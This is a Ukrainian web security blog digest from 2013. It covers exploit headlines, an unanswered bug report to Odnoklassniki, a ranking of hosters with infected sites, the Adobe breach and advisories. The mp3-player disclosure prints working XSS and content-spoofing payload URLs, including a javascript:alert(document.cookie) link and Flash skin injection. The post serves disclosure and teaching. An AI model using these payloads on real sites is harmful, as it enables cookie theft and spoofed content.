Websecurity - Веб безпека

В даній добірці експлоіти в веб додатках:

• Openfire 3.8.2 server new admin password/add new admin Exploit (деталі)
• MS13-069 Microsoft Internet Explorer CCaret Use-After-Free (деталі)
• Raidsonic NAS Devices Unauthenticated Remote Command Execution (деталі)
• Nodejs js-yaml load() Code Execution Vulnerability (деталі)
• mod_accounting 0.5 Blind SQL Injection Vulnerability (деталі)

У серпні соціальна мережа “Одноклассники” проводила конкурс на пошук уразливостей “Нация тестирует!” (з виплатою винагород за уразливості). Тоді я вирішив прийняти участь в цьому конкурсі, бо неодноразово знаходив дірки в різних соціальних мережах і в різних проектах Mail.ru (таких як drive.mail.ru, top.mail.ru, gogo.ru, rb.mail.ru і blogs.mail.ru).

Тоді я знайшов чимало різних уразливостей, деякі з яких вислав Однокласникам. Зокрема декілька знайдених 17.08.2013 уразливостей на http://www.odnoklassniki.ru. Для початку - щоб оцінити, як вони сприймають і оплачують дірки. Ось дві з них: Redirector та Information Leakage. На свого листа я отримав “автоматичну” відповідь, що мого листа отримано і все. Жодної відповіді представників компанії та виправлення уразливостей - ці та інші дірки досі не виправлені.

Redirector (URL Redirector Abuse):

odnoklassniki.ru Redirector.html

Information Leakage:

Витік інформації про Java пакети і версію веб сервера.

odnoklassniki.ru Information Leakage.html

Що дуже типово для соціальних мереж. Які забивають на безпеку, не відповідають на листи і не виплачують винагород за уразливості (навіть якщо і заявляють про проведення подібних виплат), а якщо й виправляють повідомленні дірки, то втихаря, без подяки дослідникам безпеки. Як я мав досвід з MySpace, Facebook і Яндекс в попередні роки.

В підсумках хакерської активності в Уанеті в 1 півріччі 2013 я зазначав, що всього за цей період я виявив 130 інфікованих сайтів в Уанеті. Дані сайти хостилися на серверах різних хостінг провайдерів, як українських, так і закордонних.

Пропоную вам звіт про результати мого дослідження хостінгів, які розміщували інфіковані сайти в першому півріччі 2013 року. Багато з цих хостінг провайдерів робили це і минулого року. Щоб і хостери і Інтернет користувачі знали найбільших розповсюджувачів шкідливого програмного забезпечення (через інфіковані сайти).

В першому півріччі цього року наступні хостінг провайдери розміщували на своїх серверах інфіковані сайти: 1GB LLC, Avguro Technologies, Besthosting, Bizland, Choopa, Cityhost, Colocall, Compubyte Limited, Confluence Networks, DCTeL, Datagroup, Delta-X, Digiq Net, Dream Line, eServer.ru, Freehost, Goodnet, Hetzner, HostBizUa, HostLife, HostPro, Hosting.ua, Hvosting, Info-center, Infocom, Intelex, LNUA, Majorhost, MiroHost, Modus, Navigator Online, Net Access Corporation, Relink, Rusonyx, Server.ua, ServerSnab, Service Online, Shantyr, TeNeT, The First, The Planet, TimeWeb Co., TutHost, UARNet, Ukrainian Internet Names Center, Unlim, Uteam, VPS.ua, Velton Telecom, Vizor, Volia, Wnet, Xirra, XServer, iPROsrv, iWeb, Мета, Укртелеком.

Найбільші інфіковані хостери (TOP-10):

• Compubyte Limited - 11 сайтів
• HostPro - 10 сайтів
• Freehost - 9 сайтів
• Delta-X - 8 сайтів
• Hetzner - 5 сайтів
• MiroHost - 5 сайтів
• Volia - 4 сайтів
• Besthosting - 3 сайтів
• Hvosting - 3 сайтів
• TeNeT - 3 сайтів

Всього було виявлено хостінги 122 сайта з 130. У випадку інших 8 сайтів визначити хостінги не вдалося, тому що в даний момент ці сайти вже не працювали (вони явно були закриті через розміщення malware на цих ресурсах).

За повідомленням bugtraq.ru, великий взлом Adobe.

Нещодавно Adobe повідомила про взлом своєї мережі, результатом якого стала компрометація майже трьох мільйонів (2,9 млн.) користувацьких акаунтів. Інформація, що витекла, включає імена користувачів, зашифровані паролі, зашифровані номери кредиток. Паролі даних користувачів скинуті, їм вислані відповідні попередження.

Взломщики також одержали доступ до вихідного коду Adobe Acrobat, ColdFusion, ColdFusion Builder та інших продуктів.

Враховуючі дірявість клієнтських та серверних програмних продуктів компанії Adobe (в тому числі я сам знаходив уразливості в їхніх програмах), то зовсім не дивно, що їх взломали.

За повідомленням www.xakep.ru, хакери зберігали код програм Adobe на відкритому сервері.

Невідомим хакерам, потенційно російського походження, на минулому тижні вдалося викрасти вихідні коди програм Adobe, у тому числі платформи розробки веб додатків ColdFusion. Але іноді і вони роблять помилки. Фахівець з безпеки Алекс Холден знайшов вихідні коди на відкритому сервері в Інтернеті. Хоча файл був зашифрований, але все рівно така безтурботність ні до чого.

Компанія Adobe повідомила про взлом 3 жовтня. Крім вихідних кодів, були скомпрометовані також 2,9 млн. номерів платіжних карт користувачів та інші платіжні реквізити.

За повідомленням www.opennet.ru, Google буде виплачувати винагороди за підвищення безпеки популярного вільного ПЗ.

Компанія Google оголосила про розширення дії програми по виплаті винагород за надання інформації про наявність уразливостей у браузері Chrome, компонентах Chrome OS і веб сервісах Google. Відтепер винагороду зможуть одержати також дослідники безпеки, що працюють в області підвищення безпеки популярного мережевого і системного вільного ПЗ, а також розповсюджених відкритих бібліотек.

При цьому винагороди будуть виплачуватися не тільки за виявлення факту наявності уразливостей, але і за створення покращень, що перешкоджають виникненню проблем з безпекою й попереджують появу потенційних уразливостей. Розмір винагороди складе від $500 до $3133,70 у залежності від складності, якості і важливості запропонованих змін.

12.08.2013

У травні, 22.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в mp3-player. Про що вже повідомив розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

11.10.2013

XSS (через Flash Injection) (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Flash Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=http://site2/1.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3

Content Spoofing (HTML Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E

XSS (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=+%3Cimg%20src=%27xss.swf%27%3E

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

XSS (Strictly social XSS) (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Уразливі mp3-player 2.5 та попередні версії.

Продовжуючи розпочату традицію, після попереднього відео про виконання коду в Adobe Flash Player, пропоную нове відео на веб секюріті тематику. Цього разу відео про виконання коду в Internet Explorer. Рекомендую подивитися всім хто цікавиться цією темою.

Internet Explorer Exploit (v.6-11) - SetMouseCapture Use-After-Free [CVE-2013-3893]

В даному відео ролику демонструється віддалене виконання коду в Internet Explorer версій 6-11. Використовується експлоіт для проведення атаки на уразливість в Internet Explorer (показано на прикладі IE9) при відкритті сторінки з кодом експлоіту. Що дозволяє нападнику отримати контроль над атакованим комп’ютером. Це свіжа дірка в Internet Explorer, саме відео записане 02.10.2013.

Атака відбувається при відвідуванні в IE спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на браузери.

Виявлені численні уразливості безпеки в Apple Safari.

Уразливі версії: Safari 5.1.

Пошкодження пам’яті.

• APPLE-SA-2013-09-12-2 Safari 5.1.10 (деталі)

В даній добірці експлоіти в веб додатках:

• TOSHIBA e-Studio 232/233/282/283 Change Admin Password CSRF (деталі)
• Good for Enterprise 2.2.2.1611 - XSS Vulnerability (деталі)
• Linksys WRT110 Remote Command Execution Vulnerability (деталі)
• CA BrightStor ARCserve Tape Engine 0×8A Buffer Overflow Vulnerability (деталі)
• PCMAN FTP Server Post-Authentication STOR Command Buffer Overflow (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Mukioplayer, Design-Approval-System та Simple Dropbox. Для котрих з’явилися експлоіти. Mukioplayer - це медіа плеєр, Design-Approval-System - це плагін для розгляду дизайнів, Simple Dropbox - це плагін для інтеграції з Dropbox.

• WordPress Mukioplayer 1.6 SQL Injection (деталі)
• WordPress Design-Approval-System 3.6 Cross Site Scripting (деталі)
• WordPress Simple Dropbox 1.8.8 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Виявлений слабкий PRNG-генератор в Perl Crypt::DSA.

Уразливі продукти: Crypt::DSA 1.17 модуль для Perl.

За певних умов використовується слабкий генератор.

• Vulnerability in perl-Crypt-DSA (деталі)